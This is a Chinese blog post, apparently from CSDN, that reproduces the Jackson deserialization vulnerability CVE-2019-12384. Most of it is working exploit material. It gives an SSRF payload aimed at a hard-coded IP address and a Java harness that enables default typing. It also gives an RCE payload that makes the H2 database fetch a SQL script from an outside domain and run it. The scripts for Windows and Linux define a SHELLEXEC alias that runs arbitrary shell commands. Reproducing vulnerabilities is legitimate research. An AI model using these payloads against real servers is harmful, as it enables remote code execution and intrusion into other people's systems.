jackson框架java反序列化漏洞_Jackson CVE-2019-12384: 反序列化漏洞复现

文章参考:https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

环境搭建

引入jar包:

ssrf payload:

"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]"

Main方法:

import java.io.IOException;

import com.fasterxml.jackson.databind.ObjectMapper;

import com.fasterxml.jackson.databind.SerializationFeature;

public class Test {

public static void main(String[] args) throws IOException {

String payload = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","

+ " {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]";

ObjectMapper mapper = new ObjectMapper();

mapper.enableDefaultTyping();

// mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);

Object obj = mapper.readValue(payload, java.lang.Object.class);

mapper.writeValueAsString(obj);

}

}

f34213a2d06fbbb83976fd5ae0b2074d.png

rce payload:

"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://www.a0xpg.com/inject_win.sql'\"}]";

inject_win.sql

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

String[] command = {"cmd", "/c", cmd};

java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");

return s.hasNext() ? s.next() : ""; }

$$;

CALL SHELLEXEC('calc')

e157878549ce51393e8399fcb2c82013.png

inject_linux.sql

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

String[] command = {"bash", "-c", cmd};

java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");

return s.hasNext() ? s.next() : ""; }

$$;

CALL SHELLEXEC('id > exploited.txt')

631af60bdcfa76dc3a68977d6ae402ff.png

e087eb84b07cd89094b83a2c0f8cf05c.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值